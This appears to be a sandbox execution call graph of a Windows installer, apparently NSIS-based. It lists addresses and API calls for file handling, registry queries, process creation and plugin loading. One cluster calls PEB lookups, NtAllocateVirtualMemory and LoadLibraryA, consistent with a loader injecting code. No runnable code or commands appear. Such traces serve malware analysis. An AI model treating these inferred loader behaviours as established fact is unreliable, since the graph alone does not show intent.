                                                                                                                                                                                                                                execution_graph 7915 401941 7916 401943 7915->7916 7921 402da6 7916->7921 7922 402db2 7921->7922 7966 40657a 7922->7966 7925 401948 7927 405c49 7925->7927 8008 405f14 7927->8008 7930 405c71 DeleteFileW 7932 401951 7930->7932 7931 405c88 7937 405da8 7931->7937 8022 40653d lstrcpynW 7931->8022 7934 405cae 7935 405cc1 7934->7935 7936 405cb4 lstrcatW 7934->7936 8023 405e58 lstrlenW 7935->8023 7941 405cc7 7936->7941 7937->7932 8051 406873 FindFirstFileW 7937->8051 7940 405cd7 lstrcatW 7943 405ce2 lstrlenW FindFirstFileW 7940->7943 7941->7940 7941->7943 7943->7937 7951 405d04 7943->7951 7944 405dd1 8054 405e0c lstrlenW CharPrevW 7944->8054 7947 405c01 5 API calls 7950 405de3 7947->7950 7949 405d8b FindNextFileW 7949->7951 7952 405da1 FindClose 7949->7952 7953 405de7 7950->7953 7954 405dfd 7950->7954 7951->7949 7962 405d4c 7951->7962 8027 40653d lstrcpynW 7951->8027 7952->7937 7953->7932 7957 40559f 24 API calls 7953->7957 7956 40559f 24 API calls 7954->7956 7956->7932 7959 405df4 7957->7959 7958 405c49 60 API calls 7958->7962 7961 4062fd 36 API calls 7959->7961 7960 40559f 24 API calls 7960->7949 7963 405dfb 7961->7963 7962->7949 7962->7958 7962->7960 8028 405c01 7962->8028 8036 40559f 7962->8036 8047 4062fd MoveFileExW 7962->8047 7963->7932 7970 406587 7966->7970 7967 4067aa 7968 402dd3 7967->7968 7999 40653d lstrcpynW 7967->7999 7968->7925 7983 4067c4 7968->7983 7970->7967 7971 406778 lstrlenW 7970->7971 7972 40668f GetSystemDirectoryW 7970->7972 7976 40657a 10 API calls 7970->7976 7977 4066a2 GetWindowsDirectoryW 7970->7977 7978 4067c4 5 API calls 7970->7978 7979 4066d1 SHGetSpecialFolderLocation 7970->7979 7980 406719 lstrcatW 7970->7980 7981 40657a 10 API calls 7970->7981 7992 40640b 7970->7992 7997 406484 wsprintfW 7970->7997 7998 40653d lstrcpynW 7970->7998 7971->7970 7972->7970 7976->7971 7977->7970 7978->7970 7979->7970 7982 4066e9 SHGetPathFromIDListW CoTaskMemFree 7979->7982 7980->7970 7981->7970 7982->7970 7986 4067d1 7983->7986 7984 406847 7985 40684c CharPrevW 7984->7985 7988 40686d 7984->7988 7985->7984 7986->7984 7987 40683a CharNextW 7986->7987 7990 406826 CharNextW 7986->7990 7991 406835 CharNextW 7986->7991 8004 405e39 7986->8004 7987->7984 7987->7986 7988->7925 7990->7986 7991->7987 8000 4063aa 7992->8000 7995 40646f 7995->7970 7996 40643f RegQueryValueExW RegCloseKey 7996->7995 7997->7970 7998->7970 7999->7968 8001 4063b9 8000->8001 8002 4063c2 RegOpenKeyExW 8001->8002 8003 4063bd 8001->8003 8002->8003 8003->7995 8003->7996 8005 405e3f 8004->8005 8006 405e55 8005->8006 8007 405e46 CharNextW 8005->8007 8006->7986 8007->8005 8057 40653d lstrcpynW 8008->8057 8010 405f25 8058 405eb7 CharNextW CharNextW 8010->8058 8013 405c69 8013->7930 8013->7931 8014 4067c4 5 API calls 8017 405f3b 8014->8017 8015 405f6c lstrlenW 8016 405f77 8015->8016 8015->8017 8018 405e0c 3 API calls 8016->8018 8017->8013 8017->8015 8019 406873 2 API calls 8017->8019 8021 405e58 2 API calls 8017->8021 8020 405f7c GetFileAttributesW 8018->8020 8019->8017 8020->8013 8021->8015 8022->7934 8024 405e66 8023->8024 8025 405e78 8024->8025 8026 405e6c CharPrevW 8024->8026 8025->7941 8026->8024 8026->8025 8027->7951 8064 406008 GetFileAttributesW 8028->8064 8031 405c2e 8031->7962 8032 405c24 DeleteFileW 8034 405c2a 8032->8034 8033 405c1c RemoveDirectoryW 8033->8034 8034->8031 8035 405c3a SetFileAttributesW 8034->8035 8035->8031 8037 4055ba 8036->8037 8046 40565c 8036->8046 8038 4055d6 lstrlenW 8037->8038 8039 40657a 17 API calls 8037->8039 8040 4055e4 lstrlenW 8038->8040 8041 4055ff 8038->8041 8039->8038 8042 4055f6 lstrcatW 8040->8042 8040->8046 8043 405612 8041->8043 8044 405605 SetWindowTextW 8041->8044 8042->8041 8045 405618 SendMessageW SendMessageW SendMessageW 8043->8045 8043->8046 8044->8043 8045->8046 8046->7962 8048 406311 8047->8048 8050 40631e 8047->8050 8067 406183 8048->8067 8050->7962 8052 406889 FindClose 8051->8052 8053 405dcd 8051->8053 8052->8053 8053->7932 8053->7944 8055 405dd7 8054->8055 8056 405e28 lstrcatW 8054->8056 8055->7947 8056->8055 8057->8010 8059 405ed4 8058->8059 8061 405ee6 8058->8061 8060 405ee1 CharNextW 8059->8060 8059->8061 8063 405f0a 8060->8063 8062 405e39 CharNextW 8061->8062 8061->8063 8062->8061 8063->8013 8063->8014 8065 405c0d 8064->8065 8066 40601a SetFileAttributesW 8064->8066 8065->8031 8065->8032 8065->8033 8066->8065 8068 4061b3 8067->8068 8069 4061d9 GetShortPathNameW 8067->8069 8094 40602d GetFileAttributesW CreateFileW 8068->8094 8071 4062f8 8069->8071 8072 4061ee 8069->8072 8071->8050 8072->8071 8074 4061f6 wsprintfA 8072->8074 8073 4061bd CloseHandle GetShortPathNameW 8073->8071 8075 4061d1 8073->8075 8076 40657a 17 API calls 8074->8076 8075->8069 8075->8071 8077 40621e 8076->8077 8095 40602d GetFileAttributesW CreateFileW 8077->8095 8079 40622b 8079->8071 8080 40623a GetFileSize GlobalAlloc 8079->8080 8081 4062f1 CloseHandle 8080->8081 8082 40625c 8080->8082 8081->8071 8096 4060b0 ReadFile 8082->8096 8087 40627b lstrcpyA 8090 40629d 8087->8090 8088 40628f 8089 405f92 4 API calls 8088->8089 8089->8090 8091 4062d4 SetFilePointer 8090->8091 8103 4060df WriteFile 8091->8103 8094->8073 8095->8079 8097 4060ce 8096->8097 8097->8081 8098 405f92 lstrlenA 8097->8098 8099 405fd3 lstrlenA 8098->8099 8100 405fdb 8099->8100 8101 405fac lstrcmpiA 8099->8101 8100->8087 8100->8088 8101->8100 8102 405fca CharNextA 8101->8102 8102->8099 8104 4060fd GlobalFree 8103->8104 8104->8081 10121 245d94f 10126 245db94 GetPEB 10121->10126 10123 245d954 10124 245d977 2 API calls 10123->10124 10125 2461c06 10124->10125 10126->10123 10167 402b59 10168 402b60 10167->10168 10169 402bab 10167->10169 10172 402d84 17 API calls 10168->10172 10174 402ba9 10168->10174 10170 40690a 5 API calls 10169->10170 10171 402bb2 10170->10171 10173 402da6 17 API calls 10171->10173 10175 402b6e 10172->10175 10176 402bbb 10173->10176 10177 402d84 17 API calls 10175->10177 10176->10174 10178 402bbf IIDFromString 10176->10178 10180 402b7a 10177->10180 10178->10174 10179 402bce 10178->10179 10179->10174 10185 40653d lstrcpynW 10179->10185 10184 406484 wsprintfW 10180->10184 10183 402beb CoTaskMemFree 10183->10174 10184->10174 10185->10183 8776 40175c 8777 402da6 17 API calls 8776->8777 8778 401763 8777->8778 8779 40605c 2 API calls 8778->8779 8780 40176a 8779->8780 8781 40605c 2 API calls 8780->8781 8781->8780 7857 2452b65 7864 245bf4c 7857->7864 7859 2452b6a 7867 245b1a3 7859->7867 7863 2452beb 7865 245c4e8 7864->7865 7866 245c545 LdrInitializeThunk 7865->7866 7866->7859 7868 245c59d 7867->7868 7877 245b1b3 7868->7877 7870 2452b87 7871 245dbb3 7870->7871 7872 245dc02 7871->7872 7873 245dd19 LoadLibraryA 7872->7873 7875 245e40e GetPEB 7872->7875 7874 245dd21 7873->7874 7874->7863 7876 245dd08 7875->7876 7876->7873 7879 245cb61 7877->7879 7880 245cbd9 7879->7880 7885 245dbb3 7879->7885 7888 245b1bb 7879->7888 7883 245cc2f 7880->7883 7892 245ab6e 7880->7892 7882 245dd19 LoadLibraryA 7884 245dd21 7882->7884 7883->7870 7884->7870 7885->7882 7895 245e40e GetPEB 7885->7895 7887 245dd08 7887->7882 7889 245b20c 7888->7889 7897 245b2a6 7889->7897 7891 245b21d 7891->7879 7893 245b2a6 4 API calls 7892->7893 7894 245ab98 7893->7894 7894->7880 7896 245e425 7895->7896 7896->7887 7898 245b561 7897->7898 7899 245b2bb 7897->7899 7901 2461835 7898->7901 7902 245b5eb 7898->7902 7900 245dbb3 2 API calls 7899->7900 7903 245b37d 7900->7903 7901->7891 7908 245b5ff 7902->7908 7905 2451a45 7903->7905 7906 245b50e NtAllocateVirtualMemory 7903->7906 7905->7891 7906->7898 7907 245b6f7 7907->7901 7909 2451a45 7908->7909 7912 245b615 7908->7912 7909->7907 7910 245dd19 LoadLibraryA 7911 245dd21 7910->7911 7911->7907 7912->7909 7912->7910 7913 245e40e GetPEB 7912->7913 7914 245dd08 7913->7914 7914->7910 9369 401563 9370 402ba4 9369->9370 9373 406484 wsprintfW 9370->9373 9372 402ba9 9373->9372 9374 401968 9375 402d84 17 API calls 9374->9375 9376 40196f 9375->9376 9377 402d84 17 API calls 9376->9377 9378 40197c 9377->9378 9379 402da6 17 API calls 9378->9379 9380 401993 lstrlenW 9379->9380 9381 4019a4 9380->9381 9384 4019e5 9381->9384 9386 40653d lstrcpynW 9381->9386 9383 4019d5 9383->9384 9385 4019da lstrlenW 9383->9385 9385->9384 9386->9383 8441 40176f 8442 402da6 17 API calls 8441->8442 8443 401776 8442->8443 8444 401796 8443->8444 8445 40179e 8443->8445 8480 40653d lstrcpynW 8444->8480 8481 40653d lstrcpynW 8445->8481 8448 40179c 8452 4067c4 5 API calls 8448->8452 8449 4017a9 8450 405e0c 3 API calls 8449->8450 8451 4017af lstrcatW 8450->8451 8451->8448 8473 4017bb 8452->8473 8453 406873 2 API calls 8453->8473 8454 406008 2 API calls 8454->8473 8456 4017cd CompareFileTime 8456->8473 8457 40188d 8459 40559f 24 API calls 8457->8459 8458 401864 8460 40559f 24 API calls 8458->8460 8468 401879 8458->8468 8461 401897 8459->8461 8460->8468 8462 4032b4 31 API calls 8461->8462 8464 4018aa 8462->8464 8463 40653d lstrcpynW 8463->8473 8465 4018be SetFileTime 8464->8465 8467 4018d0 CloseHandle 8464->8467 8465->8467 8466 40657a 17 API calls 8466->8473 8467->8468 8469 4018e1 8467->8469 8470 4018e6 8469->8470 8471 4018f9 8469->8471 8474 40657a 17 API calls 8470->8474 8472 40657a 17 API calls 8471->8472 8475 401901 8472->8475 8473->8453 8473->8454 8473->8456 8473->8457 8473->8458 8473->8463 8473->8466 8476 405b9d MessageBoxIndirectW 8473->8476 8479 40602d GetFileAttributesW CreateFileW 8473->8479 8477 4018ee lstrcatW 8474->8477 8475->8468 8478 405b9d MessageBoxIndirectW 8475->8478 8476->8473 8477->8475 8478->8468 8479->8473 8480->8448 8481->8449 8482 71492a7f 8483 71492acf 8482->8483 8484 71492a8f VirtualProtect 8482->8484 8484->8483 8485 2453972 8486 245ac0e TerminateProcess 8485->8486 9419 40190c 9420 401943 9419->9420 9421 402da6 17 API calls 9420->9421 9422 401948 9421->9422 9423 405c49 67 API calls 9422->9423 9424 401951 9423->9424 9439 405513 9440 405523 9439->9440 9441 405537 9439->9441 9442 405529 9440->9442 9451 405580 9440->9451 9443 40553f IsWindowVisible 9441->9443 9448 405556 9441->9448 9445 4044e5 SendMessageW 9442->9445 9446 40554c 9443->9446 9443->9451 9444 405585 CallWindowProcW 9449 405533 9444->9449 9445->9449 9452 404e54 SendMessageW 9446->9452 9448->9444 9457 404ed4 9448->9457 9451->9444 9453 404eb3 SendMessageW 9452->9453 9454 404e77 GetMessagePos ScreenToClient SendMessageW 9452->9454 9456 404eab 9453->9456 9455 404eb0 9454->9455 9454->9456 9455->9453 9456->9448 9466 40653d lstrcpynW 9457->9466 9459 404ee7 9467 406484 wsprintfW 9459->9467 9461 404ef1 9462 40140b 2 API calls 9461->9462 9463 404efa 9462->9463 9468 40653d lstrcpynW 9463->9468 9465 404f01 9465->9451 9466->9459 9467->9461 9468->9465 9954 40261c 9955 402da6 17 API calls 9954->9955 9956 402623 9955->9956 9959 40602d GetFileAttributesW CreateFileW 9956->9959 9958 40262f 9959->9958 10307 245ad26 10308 245b2a6 4 API calls 10307->10308 10309 245ad4d 10308->10309 10316 245ae8a 10309->10316 10311 245ad56 10313 245b11f 10311->10313 10319 245adc6 10311->10319 10314 245f5cb 16 API calls 10313->10314 10315 245f7aa 10314->10315 10317 245aefc 10316->10317 10318 245b083 CreateFileA 10317->10318 10318->10311 10320 245b2a6 4 API calls 10319->10320 10321 245adf4 10320->10321 10322 245ae8a CreateFileA 10321->10322 10323 245ae16 10322->10323 10323->10313 10324 245f5cb 16 API calls 10323->10324 10325 245f7aa 10324->10325 9478 40252a 9479 402de6 17 API calls 9478->9479 9480 402534 9479->9480 9481 402da6 17 API calls 9480->9481 9482 40253d 9481->9482 9483 402548 RegQueryValueExW 9482->9483 9488 40292e 9482->9488 9484 40256e RegCloseKey 9483->9484 9485 402568 9483->9485 9484->9488 9485->9484 9489 406484 wsprintfW 9485->9489 9489->9484 8149 40352d SetErrorMode GetVersionExW 8150 40357f GetVersionExW 8149->8150 8151 4035b7 8149->8151 8150->8151 8152 403610 8151->8152 8153 40690a 5 API calls 8151->8153 8154 40689a 3 API calls 8152->8154 8153->8152 8155 403626 lstrlenA 8154->8155 8155->8152 8156 403636 8155->8156 8157 40690a 5 API calls 8156->8157 8158 40363d 8157->8158 8159 40690a 5 API calls 8158->8159 8160 403644 8159->8160 8161 40690a 5 API calls 8160->8161 8162 403650 #17 OleInitialize SHGetFileInfoW 8161->8162 8240 40653d lstrcpynW 8162->8240 8165 40369d GetCommandLineW 8241 40653d lstrcpynW 8165->8241 8167 4036af 8168 405e39 CharNextW 8167->8168 8169 4036d5 CharNextW 8168->8169 8177 4036e6 8169->8177 8170 4037e4 8171 4037f8 GetTempPathW 8170->8171 8242 4034fc 8171->8242 8173 403810 8174 403814 GetWindowsDirectoryW lstrcatW 8173->8174 8175 40386a DeleteFileW 8173->8175 8178 4034fc 12 API calls 8174->8178 8252 40307d GetTickCount GetModuleFileNameW 8175->8252 8176 405e39 CharNextW 8176->8177 8177->8170 8177->8176 8183 4037e6 8177->8183 8180 403830 8178->8180 8180->8175 8182 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 8180->8182 8181 40387d 8184 403941 8181->8184 8188 403932 8181->8188 8192 405e39 CharNextW 8181->8192 8187 4034fc 12 API calls 8182->8187 8336 40653d lstrcpynW 8183->8336 8344 403b12 8184->8344 8191 403862 8187->8191 8280 403bec 8188->8280 8191->8175 8191->8184 8204 40389f 8192->8204 8193 403a69 8351 405b9d 8193->8351 8194 403a7e 8196 403a86 GetCurrentProcess OpenProcessToken 8194->8196 8197 403afc ExitProcess 8194->8197 8202 403acc 8196->8202 8203 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 8196->8203 8199 403908 8206 405f14 18 API calls 8199->8206 8200 403949 8205 405b08 5 API calls 8200->8205 8207 40690a 5 API calls 8202->8207 8203->8202 8204->8199 8204->8200 8208 40394e lstrcatW 8205->8208 8209 403914 8206->8209 8210 403ad3 8207->8210 8211 40396a lstrcatW lstrcmpiW 8208->8211 8212 40395f lstrcatW 8208->8212 8209->8184 8337 40653d lstrcpynW 8209->8337 8213 403ae8 ExitWindowsEx 8210->8213 8214 403af5 8210->8214 8211->8184 8215 40398a 8211->8215 8212->8211 8213->8197 8213->8214 8355 40140b 8214->8355 8218 403996 8215->8218 8219 40398f 8215->8219 8222 405aeb 2 API calls 8218->8222 8221 405a6e 4 API calls 8219->8221 8220 403927 8338 40653d lstrcpynW 8220->8338 8224 403994 8221->8224 8225 40399b SetCurrentDirectoryW 8222->8225 8224->8225 8226 4039b8 8225->8226 8227 4039ad 8225->8227 8340 40653d lstrcpynW 8226->8340 8339 40653d lstrcpynW 8227->8339 8230 40657a 17 API calls 8231 4039fa DeleteFileW 8230->8231 8232 403a06 CopyFileW 8231->8232 8236 4039c5 8231->8236 8232->8236 8233 403a50 8234 4062fd 36 API calls 8233->8234 8234->8184 8235 4062fd 36 API calls 8235->8236 8236->8230 8236->8233 8236->8235 8237 40657a 17 API calls 8236->8237 8239 403a3a CloseHandle 8236->8239 8341 405b20 CreateProcessW 8236->8341 8237->8236 8239->8236 8240->8165 8241->8167 8243 4067c4 5 API calls 8242->8243 8244 403508 8243->8244 8245 403512 8244->8245 8246 405e0c 3 API calls 8244->8246 8245->8173 8247 40351a 8246->8247 8248 405aeb 2 API calls 8247->8248 8249 403520 8248->8249 8358 40605c 8249->8358 8362 40602d GetFileAttributesW CreateFileW 8252->8362 8254 4030bd 8271 4030cd 8254->8271 8363 40653d lstrcpynW 8254->8363 8256 4030e3 8257 405e58 2 API calls 8256->8257 8258 4030e9 8257->8258 8364 40653d lstrcpynW 8258->8364 8260 4030f4 GetFileSize 8276 4031ee 8260->8276 8279 40310b 8260->8279 8262 4031f7 8264 403227 GlobalAlloc 8262->8264 8262->8271 8400 4034e5 SetFilePointer 8262->8400 8376 4034e5 SetFilePointer 8264->8376 8266 40325a 8268 403019 6 API calls 8266->8268 8268->8271 8269 403210 8272 4034cf ReadFile 8269->8272 8270 403242 8377 4032b4 8270->8377 8271->8181 8274 40321b 8272->8274 8274->8264 8274->8271 8275 403019 6 API calls 8275->8279 8365 403019 8276->8365 8277 40324e 8277->8271 8277->8277 8278 40328b SetFilePointer 8277->8278 8278->8271 8279->8266 8279->8271 8279->8275 8279->8276 8397 4034cf 8279->8397 8281 40690a 5 API calls 8280->8281 8282 403c00 8281->8282 8283 403c06 8282->8283 8284 403c18 8282->8284 8421 406484 wsprintfW 8283->8421 8285 40640b 3 API calls 8284->8285 8286 403c48 8285->8286 8288 403c67 lstrcatW 8286->8288 8290 40640b 3 API calls 8286->8290 8289 403c16 8288->8289 8406 403ec2 8289->8406 8290->8288 8293 405f14 18 API calls 8294 403c99 8293->8294 8295 403d2d 8294->8295 8298 40640b 3 API calls 8294->8298 8296 405f14 18 API calls 8295->8296 8297 403d33 8296->8297 8300 403d43 LoadImageW 8297->8300 8301 40657a 17 API calls 8297->8301 8299 403ccb 8298->8299 8299->8295 8304 403cec lstrlenW 8299->8304 8307 405e39 CharNextW 8299->8307 8302 403de9 8300->8302 8303 403d6a RegisterClassW 8300->8303 8301->8300 8306 40140b 2 API calls 8302->8306 8305 403da0 SystemParametersInfoW CreateWindowExW 8303->8305 8335 403df3 8303->8335 8308 403d20 8304->8308 8309 403cfa lstrcmpiW 8304->8309 8305->8302 8312 403def 8306->8312 8310 403ce9 8307->8310 8313 405e0c 3 API calls 8308->8313 8309->8308 8311 403d0a GetFileAttributesW 8309->8311 8310->8304 8314 403d16 8311->8314 8315 403ec2 18 API calls 8312->8315 8312->8335 8316 403d26 8313->8316 8314->8308 8317 405e58 2 API calls 8314->8317 8318 403e00 8315->8318 8422 40653d lstrcpynW 8316->8422 8317->8308 8320 403e0c ShowWindow 8318->8320 8321 403e8f 8318->8321 8323 40689a 3 API calls 8320->8323 8414 405672 OleInitialize 8321->8414 8324 403e24 8323->8324 8326 403e32 GetClassInfoW 8324->8326 8329 40689a 3 API calls 8324->8329 8325 403e95 8327 403eb1 8325->8327 8328 403e99 8325->8328 8331 403e46 GetClassInfoW RegisterClassW 8326->8331 8332 403e5c DialogBoxParamW 8326->8332 8330 40140b 2 API calls 8327->8330 8334 40140b 2 API calls 8328->8334 8328->8335 8329->8326 8330->8335 8331->8332 8333 40140b 2 API calls 8332->8333 8333->8335 8334->8335 8335->8184 8336->8171 8337->8220 8338->8188 8339->8226 8340->8236 8342 405b53 CloseHandle 8341->8342 8343 405b5f 8341->8343 8342->8343 8343->8236 8345 403b2a 8344->8345 8346 403b1c CloseHandle 8344->8346 8434 403b57 8345->8434 8346->8345 8349 405c49 67 API calls 8350 403a5e OleUninitialize 8349->8350 8350->8193 8350->8194 8352 405bb2 8351->8352 8353 403a76 ExitProcess 8352->8353 8354 405bc6 MessageBoxIndirectW 8352->8354 8354->8353 8356 401389 2 API calls 8355->8356 8357 401420 8356->8357 8357->8197 8359 406069 GetTickCount GetTempFileNameW 8358->8359 8360 40609f 8359->8360 8361 40352b 8359->8361 8360->8359 8360->8361 8361->8173 8362->8254 8363->8256 8364->8260 8366 403022 8365->8366 8367 40303a 8365->8367 8368 403032 8366->8368 8369 40302b DestroyWindow 8366->8369 8370 403042 8367->8370 8371 40304a GetTickCount 8367->8371 8368->8262 8369->8368 8401 406946 8370->8401 8372 403058 CreateDialogParamW ShowWindow 8371->8372 8373 40307b 8371->8373 8372->8373 8373->8262 8376->8270 8378 4032cd 8377->8378 8379 4032fb 8378->8379 8405 4034e5 SetFilePointer 8378->8405 8381 4034cf ReadFile 8379->8381 8382 403306 8381->8382 8383 403468 8382->8383 8384 403318 GetTickCount 8382->8384 8385 403452 8382->8385 8386 4034aa 8383->8386 8389 40346c 8383->8389 8384->8385 8393 403367 8384->8393 8385->8277 8388 4034cf ReadFile 8386->8388 8387 4034cf ReadFile 8387->8393 8388->8385 8389->8385 8390 4034cf ReadFile 8389->8390 8391 4060df WriteFile 8389->8391 8390->8389 8391->8389 8392 4033bd GetTickCount 8392->8393 8393->8385 8393->8387 8393->8392 8394 4033e2 MulDiv wsprintfW 8393->8394 8396 4060df WriteFile 8393->8396 8395 40559f 24 API calls 8394->8395 8395->8393 8396->8393 8398 4060b0 ReadFile 8397->8398 8399 4034e2 8398->8399 8399->8279 8400->8269 8402 406963 PeekMessageW 8401->8402 8403 403048 8402->8403 8404 406959 DispatchMessageW 8402->8404 8403->8262 8404->8402 8405->8379 8407 403ed6 8406->8407 8423 406484 wsprintfW 8407->8423 8409 403f47 8424 403f7b 8409->8424 8411 403c77 8411->8293 8412 403f4c 8412->8411 8413 40657a 17 API calls 8412->8413 8413->8412 8427 4044e5 8414->8427 8416 4056bc 8417 4044e5 SendMessageW 8416->8417 8418 4056ce OleUninitialize 8417->8418 8418->8325 8419 405695 8419->8416 8430 401389 8419->8430 8421->8289 8422->8295 8423->8409 8425 40657a 17 API calls 8424->8425 8426 403f89 SetWindowTextW 8425->8426 8426->8412 8428 4044fd 8427->8428 8429 4044ee SendMessageW 8427->8429 8428->8419 8429->8428 8432 401390 8430->8432 8431 4013fe 8431->8419 8432->8431 8433 4013cb MulDiv SendMessageW 8432->8433 8433->8432 8435 403b65 8434->8435 8436 403b2f 8435->8436 8437 403b6a FreeLibrary GlobalFree 8435->8437 8436->8349 8437->8436 8437->8437 9989 40263e 9990 402652 9989->9990 9991 40266d 9989->9991 9992 402d84 17 API calls 9990->9992 9993 402672 9991->9993 9994 40269d 9991->9994 10003 402659 9992->10003 9995 402da6 17 API calls 9993->9995 9996 402da6 17 API calls 9994->9996 9997 402679 9995->9997 9998 4026a4 lstrlenW 9996->9998 10006 40655f WideCharToMultiByte 9997->10006 9998->10003 10000 40268d lstrlenA 10000->10003 10001 4026d1 10002 4060df WriteFile 10001->10002 10004 4026e7 10001->10004 10002->10004 10003->10001 10003->10004 10007 40610e SetFilePointer 10003->10007 10006->10000 10008 40612a 10007->10008 10011 406142 10007->10011 10009 4060b0 ReadFile 10008->10009 10010 406136 10009->10010 10010->10011 10012 406173 SetFilePointer 10010->10012 10013 40614b SetFilePointer 10010->10013 10011->10001 10012->10011 10013->10012 10014 406156 10013->10014 10015 4060df WriteFile 10014->10015 10015->10011 8105 4015c1 8106 402da6 17 API calls 8105->8106 8107 4015c8 8106->8107 8108 405eb7 4 API calls 8107->8108 8121 4015d1 8108->8121 8109 401631 8111 401663 8109->8111 8112 401636 8109->8112 8110 405e39 CharNextW 8110->8121 8114 401423 24 API calls 8111->8114 8132 401423 8112->8132 8118 40165b 8114->8118 8120 40164a SetCurrentDirectoryW 8120->8118 8121->8109 8121->8110 8122 401617 GetFileAttributesW 8121->8122 8124 405b08 8121->8124 8127 405a6e CreateDirectoryW 8121->8127 8136 405aeb CreateDirectoryW 8121->8136 8122->8121 8139 40690a GetModuleHandleA 8124->8139 8128 405abb 8127->8128 8129 405abf GetLastError 8127->8129 8128->8121 8129->8128 8130 405ace SetFileSecurityW 8129->8130 8130->8128 8131 405ae4 GetLastError 8130->8131 8131->8128 8133 40559f 24 API calls 8132->8133 8134 401431 8133->8134 8135 40653d lstrcpynW 8134->8135 8135->8120 8137 405afb 8136->8137 8138 405aff GetLastError 8136->8138 8137->8121 8138->8137 8140 406930 GetProcAddress 8139->8140 8141 406926 8139->8141 8144 405b0f 8140->8144 8145 40689a GetSystemDirectoryW 8141->8145 8143 40692c 8143->8140 8143->8144 8144->8121 8146 4068bc wsprintfW LoadLibraryExW 8145->8146 8146->8143 10016 4016cc 10017 402da6 17 API calls 10016->10017 10018 4016d2 GetFullPathNameW 10017->10018 10019 4016ec 10018->10019 10025 40170e 10018->10025 10021 406873 2 API calls 10019->10021 10019->10025 10020 401723 GetShortPathNameW 10022 402c2a 10020->10022 10023 4016fe 10021->10023 10023->10025 10026 40653d lstrcpynW 10023->10026 10025->10020 10025->10022 10026->10025 8488 4020d8 8489 4020ea 8488->8489 8499 40219c 8488->8499 8490 402da6 17 API calls 8489->8490 8492 4020f1 8490->8492 8491 401423 24 API calls 8497 4022f6 8491->8497 8493 402da6 17 API calls 8492->8493 8494 4020fa 8493->8494 8495 402110 LoadLibraryExW 8494->8495 8496 402102 GetModuleHandleW 8494->8496 8498 402121 8495->8498 8495->8499 8496->8495 8496->8498 8511 406979 8498->8511 8499->8491 8502 402132 8504 402151 8502->8504 8505 40213a 8502->8505 8503 40216b 8506 40559f 24 API calls 8503->8506 8516 71491817 8504->8516 8507 401423 24 API calls 8505->8507 8508 402142 8506->8508 8507->8508 8508->8497 8509 40218e FreeLibrary 8508->8509 8509->8497 8558 40655f WideCharToMultiByte 8511->8558 8513 406996 8514 40699d GetProcAddress 8513->8514 8515 40212c 8513->8515 8514->8515 8515->8502 8515->8503 8517 7149184a 8516->8517 8559 71491bff 8517->8559 8519 71491851 8520 71491976 8519->8520 8521 71491869 8519->8521 8522 71491862 8519->8522 8520->8508 8593 71492480 8521->8593 8607 7149243e 8522->8607 8527 714918cd 8533 7149191e 8527->8533 8534 714918d3 8527->8534 8528 714918af 8620 71492655 8528->8620 8529 71491898 8544 7149188e 8529->8544 8617 71492e23 8529->8617 8530 7149187f 8532 71491885 8530->8532 8538 71491890 8530->8538 8532->8544 8603 71492b98 8532->8603 8536 71492655 10 API calls 8533->8536 8639 71491666 8534->8639 8542 7149190f 8536->8542 8537 714918b5 8631 71491654 8537->8631 8611 71492810 8538->8611 8557 71491965 8542->8557 8645 71492618 8542->8645 8544->8527 8544->8528 8546 71492655 10 API calls 8546->8542 8548 71491896 8548->8544 8550 7149196f GlobalFree 8550->8520 8554 71491951 8554->8557 8649 714915dd wsprintfW 8554->8649 8555 7149194a FreeLibrary 8555->8554 8557->8520 8557->8550 8558->8513 8652 714912bb GlobalAlloc 8559->8652 8561 71491c26 8653 714912bb GlobalAlloc 8561->8653 8563 71491e6b GlobalFree GlobalFree GlobalFree 8564 71491e88 8563->8564 8577 71491ed2 8563->8577 8565 7149227e 8564->8565 8573 71491e9d 8564->8573 8564->8577 8567 714922a0 GetModuleHandleW 8565->8567 8565->8577 8566 71491d26 GlobalAlloc 8586 71491c31 8566->8586 8570 714922b1 LoadLibraryW 8567->8570 8571 714922c6 8567->8571 8568 71491d71 lstrcpyW 8572 71491d7b lstrcpyW 8568->8572 8569 71491d8f GlobalFree 8569->8586 8570->8571 8570->8577 8660 714916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8571->8660 8572->8586 8573->8577 8656 714912cc 8573->8656 8575 71492318 8575->8577 8579 71492325 lstrlenW 8575->8579 8576 71492126 8659 714912bb GlobalAlloc 8576->8659 8577->8519 8661 714916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8579->8661 8581 71492067 GlobalFree 8581->8586 8582 714921ae 8582->8577 8589 71492216 lstrcpyW 8582->8589 8583 714922d8 8583->8575 8591 71492302 GetProcAddress 8583->8591 8585 7149233f 8585->8577 8586->8563 8586->8566 8586->8568 8586->8569 8586->8572 8586->8576 8586->8577 8586->8581 8586->8582 8587 714912cc 2 API calls 8586->8587 8588 71491dcd 8586->8588 8587->8586 8588->8586 8654 7149162f GlobalSize GlobalAlloc 8588->8654 8589->8577 8591->8575 8592 7149212f 8592->8519 8600 71492498 8593->8600 8595 714925c1 GlobalFree 8598 7149186f 8595->8598 8595->8600 8596 7149256b GlobalAlloc CLSIDFromString 8596->8595 8597 71492540 GlobalAlloc WideCharToMultiByte 8597->8595 8598->8529 8598->8530 8598->8544 8599 714912cc GlobalAlloc lstrcpynW 8599->8600 8600->8595 8600->8596 8600->8597 8600->8599 8602 7149258a 8600->8602 8663 7149135a 8600->8663 8602->8595 8667 714927a4 8602->8667 8606 71492baa 8603->8606 8605 71492d39 8605->8544 8670 71492b42 8606->8670 8608 71492453 8607->8608 8609 7149245e GlobalAlloc 8608->8609 8610 71491868 8608->8610 8609->8608 8610->8521 8615 71492840 8611->8615 8612 714928db GlobalAlloc 8616 714928fe 8612->8616 8613 714928ee 8614 714928f4 GlobalSize 8613->8614 8613->8616 8614->8616 8615->8612 8615->8613 8616->8548 8619 71492e2e 8617->8619 8618 71492e6e GlobalFree 8619->8618 8674 714912bb GlobalAlloc 8620->8674 8622 714926d8 MultiByteToWideChar 8625 7149265f 8622->8625 8623 7149270b lstrcpynW 8623->8625 8624 714926fa StringFromGUID2 8624->8625 8625->8622 8625->8623 8625->8624 8626 7149271e wsprintfW 8625->8626 8627 71492742 GlobalFree 8625->8627 8628 71492777 GlobalFree 8625->8628 8629 71491312 2 API calls 8625->8629 8675 71491381 8625->8675 8626->8625 8627->8625 8628->8537 8629->8625 8679 714912bb GlobalAlloc 8631->8679 8633 71491659 8634 